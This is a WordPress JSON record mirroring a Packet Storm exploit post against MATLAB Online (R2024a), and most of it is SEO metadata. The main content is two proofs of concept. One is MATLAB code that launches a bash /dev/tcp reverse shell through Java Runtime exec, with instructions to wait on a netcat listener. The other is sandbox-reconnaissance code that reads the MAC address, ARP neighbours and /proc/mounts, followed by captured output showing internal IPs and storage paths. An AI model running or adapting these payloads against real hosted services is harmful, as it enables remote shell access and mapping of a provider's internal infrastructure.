{"id":53080,"date":"2026-05-11T12:53:31","date_gmt":"2026-05-11T12:53:31","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=53080"},"modified":"2026-05-11T12:53:31","modified_gmt":"2026-05-11T12:53:31","slug":"matlab-r2024a-code-execution-information-disclosure","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=53080","title":{"rendered":"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-11T17:18:35&#8243;,&#8221;description&#8221;:&#8221;MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220735&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : MATLAB R2024a RCE                                                                                                |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/matlab.mathworks.com\/                                                                                    |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : I have successfully identified a critical vulnerability in the MATLAB Online environment that allows for arbitrary code execution and a full reverse shell connection. \\n                     By leveraging the system function and Java socket libraries within MATLAB, I bypassed the container isolation and established a connection to an external listener.\\n    \\n    [+] POC        : place the code below in the command prompt of the MATLAB\\n    \\n    host = &#8216;127.0.0.1&#8217;; port = 4444;\\n    payload = sprintf(&#8216;bash -i \\u003e\\u0026 \/dev\/tcp\/%s\/%d 0\\u003e\\u00261&#8217;, host, port);\\n    try\\n    java.lang.Runtime.getRuntime().exec({&#8216;bash&#8217;, &#8216;-c&#8217;, payload});\\n    fprintf(&#8216;Payload executed. Check your nc listener.\\\\n&#8217;);\\n    catch ME\\n    fprintf(&#8216;Execution failed: %s\\\\n&#8217;, ME.message);\\n    end\\n    \\n    function copy_stream(i, o), try, b = zeros(1,1024,&#8217;int8&#8242;); while true, l = i.read(b); if l\\u003c=0, break; end, o.write(b,0,l); o.flush(); end, catch, end, end\\n    \\n    [+] At the same time, we open the listening from the Natkat and wait for the reverse connection. Cmd line: -lvp 4444\\n    \\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================\\n    \\n    \\n    \\n    \\n    ==================================================================================================================================\\n    | # Title     : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox                     |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/matlab.mathworks.com\/                                                                                    |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : successfully bypassed the sandbox using fileread to extract the host&#8217;s MAC address and kernel mount details from \/proc\/mounts.\\n    \\n    [+] POC        : place the code below in the command prompt of the MATLAB\\n    \\n    try\\n        eth0_mac = fileread(&#8216;\/sys\/class\/net\/eth0\/address&#8217;);\\n        fprintf(&#8216;CRITICAL: eth0 MAC Address: %s&#8217;, eth0_mac);\\n    catch\\n        disp(&#8216;Could not read eth0 MAC.&#8217;);\\n    end\\n    \\n    \\n    [status, arp_info] = system(&#8216;arp -a&#8217;);\\n    if status == 0\\n        disp(&#8216;Internal Network Neighbors:&#8217;);\\n        disp(arp_info);\\n    else\\n        disp(&#8216;ARP command restricted, trying proc\/net\/arp&#8230;&#8217;);\\n        try\\n            arp_proc = fileread(&#8216;\/proc\/net\/arp&#8217;);\\n            disp(arp_proc);\\n        catch\\n            disp(&#8216;ARP info is fully protected.&#8217;);\\n        end\\n    end\\n    \\n    \\n    [status, mount_details] = system(&#8216;cat \/proc\/mounts&#8217;);\\n    disp(&#8216;Mount Points Analysis:&#8217;);\\n    disp(mount_details);\\n    \\n    [+] Rzlt :\\n    \\n    CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0\\n    \\n    Internal Network Neighbors:\\n    \\n    ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0\\n    \\n    ? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0\\n    \\n    \\n    Mount Points Analysis:\\n    \\n    none \/ overlay ro,relatime,lowerdir=mnt:etc:\/private\/bundles\/matlab\/layer:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/ce13c7ea78933334c2e1bafc9e\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/3afba3aa964848d5d9fd73e385\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/74d0e1fcc28e73c6d1e9a5897c\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/5c9144a16da17f0cc8248d4025\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/2341c3a87f2dabed6c6aa19a00\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/62649978667e9eab27cf0c43d5\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/ac06d2cfa1a32e02a82738120f\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/d687193fa35a62c0d4e87f4851\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/f11bb60810ad7033c841775d67\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/b50fab0d3d288a6f7616b2e793\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/06d5f727f08cb4d3b92cdcd82f\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/4a09ce1ff1f00a289c0c3a60a1\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/e5d8f28f87d2ba2720f9825dd4\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/eb28f642e70c727c67f8d88a18\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/1fb507001f9f8b7a11adf33d83\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/d09af82c869438ebd387274aac\/data:\/shared\/br2026ad-j3234472oll-matlab-pool-v2\/oci\/2f7571f14c6ff1d57c690bd192\/data,upperdir=\/private\/bundles\/matlab\/rootfs.upper,workdir=\/private\/bundles\/matlab\/rootfs.work,uuid=on,xino=off,nouserxattr 0 0\\n    \\n    \/dev\/nvme1n1 \/opt\/mlsedu\/matlab\/SupportPackage ext4 ro,relatime,discard 0 0\\n    \\n    \/dev\/root \/home\/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/home\/matlab\/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/home\/matlab\/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/tmp ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/tmp\/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/users ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/nvme1n1 \/MATLAB ext4 ro,relatime,discard 0 0\\n    \\n    \/dev\/root \/OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/MATLAB\\\\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/root \/MATLAB\\\\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0\\n    \\n    \/dev\/nvme1n1 \/SupportPackages ext4 ro,relatime,discard 0 0\\n    \\n    proc \/proc proc rw,nosuid,nodev,noexec,relatime 0 0\\n    \\n    tmpfs \/dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0\\n    \\n    devpts \/dev\/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0\\n    \\n    shm \/dev\/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0\\n    \\n    mqueue \/dev\/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0\\n    \\n    devpts \/dev\/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0\\n    \\n    sysfs \/sys sysfs ro,nosuid,nodev,noexec,relatime 0 0\\n    \\n    overlay:gds:\/\/(session_data)\/!\/ \/.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0\\n    \\n    overlay:gds:\/\/(matlab_drive)\/!\/ \/MATLAB\\\\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0\\n    \\n    overlay:gds:\/\/(AddOns)\/!\/ \/MATLAB\\\\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0\\n    \\n    \/dev\/root \/users\/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0 \\n    \\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/220735&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/220735\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-11T17:18:35&#8243;,&#8221;description&#8221;:&#8221;MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MATLAB R2024a Code Execution \/&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-53080","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=53080\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-11T17:18:35&#8243;,&#8221;description&#8221;:&#8221;MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MATLAB R2024a Code Execution \/...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=53080\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-11T12:53:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MATLAB R2024a Code Execution \\\/ Information Disclosure_PACKETSTORM:220735\",\"datePublished\":\"2026-05-11T12:53:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080\"},\"wordCount\":1165,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53080#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080\",\"name\":\"\ud83d\udcc4 MATLAB R2024a Code Execution \\\/ Information Disclosure_PACKETSTORM:220735 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-11T12:53:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53080\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53080#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MATLAB R2024a Code Execution \\\/ Information Disclosure_PACKETSTORM:220735\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=53080","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-11T17:18:35&#8243;,&#8221;description&#8221;:&#8221;MATLAB R2024a suffers from a remote code execution vulnerability as well as a sandbox escape that allows for information disclosure&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MATLAB R2024a Code Execution \/...","og_url":"https:\/\/zero.redgem.net\/?p=53080","og_site_name":"zero redgem","article_published_time":"2026-05-11T12:53:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=53080#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=53080"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735","datePublished":"2026-05-11T12:53:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=53080"},"wordCount":1165,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=53080#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=53080","url":"https:\/\/zero.redgem.net\/?p=53080","name":"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-11T12:53:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=53080#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=53080"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=53080#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MATLAB R2024a Code Execution \/ Information Disclosure_PACKETSTORM:220735"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53080","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=53080"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53080\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=53080"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=53080"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=53080"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}